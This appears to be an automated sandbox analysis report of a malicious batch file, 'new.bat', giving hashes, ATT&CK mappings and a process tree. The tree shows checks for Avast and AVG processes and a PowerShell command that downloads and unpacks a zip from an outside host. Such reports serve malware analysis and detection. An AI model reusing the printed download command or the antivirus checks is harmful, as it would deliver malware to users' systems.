8cff7f991f38a735a829c6aeb8d1482e76eba84c4ad1c4492a34d1b88a972cba

General

Target

new.bat
Size

3KB
MD5

055280c92e8c42372a9ebb2520c2a61b
SHA1

29b89bef3bb747576c6b69ce8baa6453f21d8cc4
SHA256

8cff7f991f38a735a829c6aeb8d1482e76eba84c4ad1c4492a34d1b88a972cba
SHA512

9b1ac53e79909d5b18b976d8b9e064e334071ef0e70b39b9137781e5b9b575d294e1d53a12e63c416c40c0952a5c70c8f8e0df962a8c3f77b2dd366884cf6731

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
7	3940	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
3940	powershell.exe
3152	powershell.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
2432	tasklist.exe
2504	tasklist.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
3940	powershell.exe
3940	powershell.exe
3152	powershell.exe
3152	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2432	tasklist.exe
Token: SeDebugPrivilege	2504	tasklist.exe
Token: SeDebugPrivilege	3940	powershell.exe
Token: SeDebugPrivilege	3152	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1256 wrote to memory of 2432	1256	cmd.exe	84
PID 1256 wrote to memory of 2432	1256	cmd.exe	84
PID 1256 wrote to memory of 3880	1256	cmd.exe	85
PID 1256 wrote to memory of 3880	1256	cmd.exe	85
PID 1256 wrote to memory of 2504	1256	cmd.exe	87
PID 1256 wrote to memory of 2504	1256	cmd.exe	87
PID 1256 wrote to memory of 1636	1256	cmd.exe	88
PID 1256 wrote to memory of 1636	1256	cmd.exe	88
PID 1256 wrote to memory of 3940	1256	cmd.exe	89
PID 1256 wrote to memory of 3940	1256	cmd.exe	89
PID 1256 wrote to memory of 3152	1256	cmd.exe	109
PID 1256 wrote to memory of 3152	1256	cmd.exe	109

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\new.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1256
- C:\Windows\system32\tasklist.exe
  tasklist /FI "IMAGENAME eq AvastUI.exe"
  2⤵
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
  PID:2432
- C:\Windows\system32\find.exe
  find /i "AvastUI.exe"
  2⤵
  PID:3880
- C:\Windows\system32\tasklist.exe
  tasklist /FI "IMAGENAME eq avgui.exe"
  2⤵
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
  PID:2504
- C:\Windows\system32\find.exe
  find /i "avgui.exe"
  2⤵
  PID:1636
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:3044/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3940
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "try { Expand-Archive -Path 'C:\Users\Admin\Downloads\downloaded.zip' -DestinationPath 'C:\Users\Admin\Downloads\Extracted' -Force } catch { exit 1 }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3152

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Process Discovery

1

T1057

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fc28168b916bf9744961653d503e1164

SHA1
71deadab13b81a414582f931e9af010152463644

SHA256
a2a78e9fb30fe365d454ca6bbbf950355049c978262fdf0e80cd683622cf00e9

SHA512
08d828e18ccb2892f12dcbbaf5a5ffcafb4e2e768536fc46b3d2fce788c52b2f61058e1ef0a47e648e2308f4f1aeb8799bef9472726d2800fa9b775f401e08c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sdj0pho5.qob.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\downloaded.zip

Filesize
46.4MB

MD5
76f7898ee872ce9db697b89f39bd5db8

SHA1
62777349a1cff7de5aa7bcf60987ecd36ab04542

SHA256
4ad0191176a1dc8efe3f59b96fc000b564b9a5a51a549a0fe6bf61594bed7bb7

SHA512
6896550fecb9246951e0d8c6ea828dbb5345a58a11a3dfdfd8b4e7fab91d2b1abf67c869b300288432979eb665862b40d44239cb2167dab454794aad8b0cc7f0

Download Submit
memory/3152-31-0x0000015BDBAA0000-0x0000015BDBAAA000-memory.dmp

Filesize
40KB

Download
memory/3152-30-0x0000015BDC470000-0x0000015BDC482000-memory.dmp

Filesize
72KB

Download
memory/3940-11-0x00007FFC7BA90000-0x00007FFC7C551000-memory.dmp

Filesize
10.8MB

Download
memory/3940-18-0x00007FFC7BA90000-0x00007FFC7C551000-memory.dmp

Filesize
10.8MB

Download
memory/3940-14-0x00007FFC7BA90000-0x00007FFC7C551000-memory.dmp

Filesize
10.8MB

Download
memory/3940-13-0x00007FFC7BA93000-0x00007FFC7BA95000-memory.dmp

Filesize
8KB

Download
memory/3940-12-0x00007FFC7BA90000-0x00007FFC7C551000-memory.dmp

Filesize
10.8MB

Download
memory/3940-0-0x00007FFC7BA93000-0x00007FFC7BA95000-memory.dmp

Filesize
8KB

Download
memory/3940-6-0x000002662F480000-0x000002662F4A2000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing